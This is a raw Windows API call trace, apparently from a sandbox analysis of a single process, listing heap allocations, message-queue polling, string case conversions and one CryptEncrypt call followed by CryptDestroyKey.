[0256.011] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0256.011] CharLowerBuffW (in: lpsz="byte[26976]", cchLength=0xb | out: lpsz="byte[26976]") returned 0xb [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.012] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.012] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0256.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.012] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.013] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.013] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.013] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.013] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.014] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24db688*, pdwDataLen=0x8bef68*=0x695b, dwBufLen=0x6960 | out: pbData=0x24db688*, pdwDataLen=0x8bef68*=0x6960) returned 1 [0256.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0256.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0256.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0256.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.021] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.021] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.022] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.022] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.022] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.022] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.022] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.022] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.023] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.023] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.023] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.023] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.023] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.023] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.024] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.024] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.024] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.024] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.024] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.032] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.032] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.032] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0256.033] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.033] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0256.033] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.033] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.033] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.033] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.034] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.034] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.034] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.034] CryptDestroyKey (hKey=0xaa59a0) returned 1 [0256.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.035] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.035] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.035] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.035] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.035] 